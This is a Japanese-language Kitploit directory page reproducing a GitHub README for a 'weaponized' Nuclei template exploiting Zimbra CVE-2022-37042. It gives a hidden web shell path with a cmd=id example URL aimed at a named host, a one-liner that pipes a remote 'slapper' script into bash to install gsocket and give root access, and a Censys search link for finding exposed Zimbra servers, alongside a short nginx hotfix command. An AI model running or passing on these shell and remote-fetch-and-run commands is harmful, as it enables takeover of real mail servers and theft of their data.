Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-37042 — Zimbra CVE-2022-37042 Nuclei 武装化テンプレート | Kitploit
ツール/GitHubGitHub/aels/cve-2022-37042
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubaels/cve-2022-37042

CVE-2022-37042

Zimbra CVE-2022-37042 Nuclei 武装化テンプレート

リポジトリを見る
181114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-37042

image

Zimbra CVE-2022-37042 Nuclei 武器化テンプレート

シェルパス: /public/formatter.jsp

Nuclei 自体: https://github.com/projectdiscovery/nuclei

シェルには不透明度0の隠し入力があります。マウスをホバーしてコマンドを入力し、[Enter]キーを押してください:

image

シェルURLの例:

root@kitploit:~
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

CVE-2022-37042 所有サーバーを修正するホットフィックス

次のコマンドを実行してください(ただし1回だけ):

root@kitploit:~
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

NginxではなくApacheを使用するサーバーには追加のコードが必要です。プルリクエストを歓迎します。

zimbslap 経由の Zimbra 自動root化

root@kitploit:~
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

このコマンドはグローバルソケット (https://www.gsocket.io/deploy/) をインストールし、ルートとして接続するためのキーを提供します。

Zimbra IP を取得

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

ハッピーバースデー・マサカー、クソ野郎ども ;)

ツールをダウンロード